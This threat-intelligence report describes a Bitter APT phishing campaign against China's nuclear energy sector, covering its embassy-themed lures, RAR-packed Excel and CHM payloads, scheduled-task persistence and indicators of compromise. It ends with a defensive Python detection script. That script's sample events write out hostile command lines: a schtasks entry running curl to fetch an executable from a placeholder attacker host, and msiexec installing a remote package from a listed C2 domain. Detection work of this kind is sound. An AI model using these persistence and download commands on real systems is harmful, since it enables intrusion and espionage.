Bitter APT Group Targets China’s Nuclear Energy Industry
Intezer has been monitoring activity aimed at the energy industry and has observed a campaign using methods similar to those of Bitter APT. Organizations continue to be targeted by the Bitter APT's espionage effort.
The emails use a variety of social engineering strategies. The phishing emails are sent using names and email addresses that appear to belong to an "Embassy in Beijing"; because a free email provider is used, domain reputation checks are of no help.
The name and contact information of a real attaché from the Kyrgyz embassy in China appear at the end of the email, so a recipient who looked this employee up with a search engine would quickly find corroborating information. Emails that also refer to nuclear energy target individuals and organizations in academia.
Malicious Payloads
The bait in the phishing emails asks the recipients to attend seminars on topics that interest them. The lures are designed to persuade the recipient to download and open an attached RAR file that contains either an Excel payload or a Microsoft Compiled HTML Help (CHM) payload.
Numerous payloads have been observed being delivered: Equation Editor exploits in Microsoft Excel files, or CHM files. These payloads are packed inside RAR files, which defeats static analysis methods that do not first decompress the archive.
The Excel payloads contain nothing more than the Equation Editor exploit, which creates two distinct scheduled tasks. Every 15 minutes, one scheduled task downloads a next-stage EXE payload using cURL and sends the name of the compromised machine to the actor.
CHM payloads do not require a vulnerable version of Microsoft Office to be installed, as the Excel files do, and they use LZX compression, which lets them evade static malware detection tools that do not decompress the file. These properties make CHM payloads advantageous for the actor.
The first variant of the CHM file creates a scheduled task that runs a remote MSI payload from the C2 using the living-off-the-land binary msiexec. String concatenation is used to split the command string for obfuscation. The username and computer name are also sent to the C2.
Indicators of Compromise
File Hashes (SHA256)
- 5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1
- eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e
- cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179
- 8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74
- 33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799
- 5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc
- ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1
- b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa
- 33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b
- 7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf
- 07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88
- 06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431
- ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446
Domains
- qwavemediaservice[.]net
- mirzadihatti[.]com
- coauthcn[.]com
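The scheduled-task and msiexec behaviour described in the Malicious Payloads section, together with the indicators listed here, as an added detection example that is not part of the original report: a Python script that runs over constructed process-creation events and flags scheduled tasks whose action pulls from a URL with curl or msiexec, msiexec launching a remote MSI, and any contacted domain or file hash that matches the published IoCs. The event schema (`process`, `cmdline`, `sha256`), the `attacker.example` host and the benign installer event are assumptions made for the example; the domains and hashes in `IOC_DOMAINS` and `IOC_SHA256` are copied from the IoC list above.

```python
import re
from typing import Dict, List, Tuple

# Indicators copied from the report's IoC section (domains refanged, hashes lowercased).
IOC_DOMAINS = {"qwavemediaservice.net", "mirzadihatti.com", "coauthcn.com"}
IOC_SHA256 = {
    "5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1",
    "eb7aebded5549f8b006e19052e0d03dc9095c75a800897ff14ef872f18c8650e",
    "cac239cf09a6a5bc1f9a3b29141336773c957d570212b97f73e13122fe032179",
    "8d2f6b0d7a6a06708593cc64d9187878ea9d2cc3ae9a657926aa2a8522b93f74",
    "33905e2db3775d2e8e75c61e678d193ac2bab5b5a89d798effbceb9ab202d799",
    "5c85194ade91736a12b1eeeb13baa0b0da88c5085ca0530c4f1d86342170b3bc",
    "ef4fb1dc3d1ca5ea8a88cd94596722b93524f928d87dff0d451d44da4e9181f1",
    "b2566755235c1df3371a7650d94339e839efaa85279656aa9ab4dc4f2d94bbfa",
    "33a20950e7f4b2191706ddf9089f1e91be1e5384cca00a57cf6b58056f70c96b",
    "7e7e90b076ef3ea4ef8ed4ef14fb599a2acb15d9ce00c78e5949186da1e355cf",
    "07504fcef717e6b74ed381e94eab5a9140171572b5572cda87b275e3873c8a88",
    "06b4c1f46845cee123b2200324a3ebb7fdbea8e2c6ef4135e3f943bd546a2431",
    "ded0635c5ef9c3d63543abc36a69b1176875dba84ca005999986bd655da3a446",
}

# Host part of any http/https URL appearing in a command line.
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.IGNORECASE)


def refang(ioc: str) -> str:
    """Convert a defanged indicator ('coauthcn[.]com', 'hxxp://') to its plain form."""
    return ioc.replace("[.]", ".").replace("hxxp", "http")


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of the detections that fire on one process event.

    Event schema (constructed for this example): 'process' is the full image
    path, 'cmdline' the command line, 'sha256' the hash of the file the event
    concerns (the executable, or the document a viewer was asked to open).
    """
    exe = event.get("process", "").lower().rsplit("\\", 1)[-1]
    cmd = event.get("cmdline", "")
    lcmd = cmd.lower()
    hosts = {h.lower() for h in URL_RE.findall(cmd)}
    findings: List[str] = []

    # Scheduled task whose action fetches or runs something from a URL via curl/msiexec.
    if exe == "schtasks.exe" and "/create" in lcmd and hosts and (
        "curl" in lcmd or "msiexec" in lcmd
    ):
        findings.append("scheduled_task_remote_lolbin")
    # msiexec pointed at a remote package instead of a local .msi.
    if exe == "msiexec.exe" and hosts:
        findings.append("msiexec_remote_msi")
    # Contacted host is a published domain or a subdomain of one.
    if any(h == d or h.endswith("." + d) for h in hosts for d in IOC_DOMAINS):
        findings.append("ioc_domain")
    # File hash matches the published list.
    if event.get("sha256", "").lower() in IOC_SHA256:
        findings.append("ioc_hash")
    return findings


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Run classify() over a batch and keep only the events that produced findings."""
    hits = []
    for index, event in enumerate(events):
        findings = classify(event)
        if findings:
            hits.append((index, findings))
    return hits


# Constructed sample events; 'attacker.example' is a placeholder host, not from the report.
SAMPLE_EVENTS = [
    {   # task re-running curl every 15 minutes to fetch a next-stage EXE
        "process": r"C:\Windows\System32\schtasks.exe",
        "cmdline": r'schtasks /create /sc minute /mo 15 /tn "Updater" /tr "curl -o C:\Users\Public\u.exe http://attacker.example/u.exe"',
        "sha256": "0" * 64,
    },
    {   # msiexec fetching a remote MSI from one of the report's domains
        "process": r"C:\Windows\System32\msiexec.exe",
        "cmdline": "msiexec /i http://coauthcn.com/update.msi /q",
        "sha256": "1" * 64,
    },
    {   # benign local installer: no URL, no indicator match
        "process": r"C:\Windows\System32\msiexec.exe",
        "cmdline": r"msiexec /i C:\Temp\tool.msi /qn",
        "sha256": "2" * 64,
    },
    {   # HTML Help viewer opening a CHM whose hash is on the published list
        "process": r"C:\Windows\hh.exe",
        "cmdline": r"hh.exe C:\Users\user\Downloads\seminar.chm",
        "sha256": "5f663f15701f429f17cc309d10ca03ee00fd20f733220cc9d2502eff5d0cd1a1",
    },
]

if __name__ == "__main__":
    for index, findings in scan(SAMPLE_EVENTS):
        print(index, SAMPLE_EVENTS[index]["cmdline"], "->", ", ".join(findings))
```

The behavioural rules (task creation with a URL-fetching action, msiexec with a remote package) are what catch the next campaign when the hashes and domains rotate; the indicator matches are the cheap retro-hunt over existing telemetry. Because the report says the CHM hides the command through string concatenation, the rules match the process event as executed rather than the text stored inside the archive.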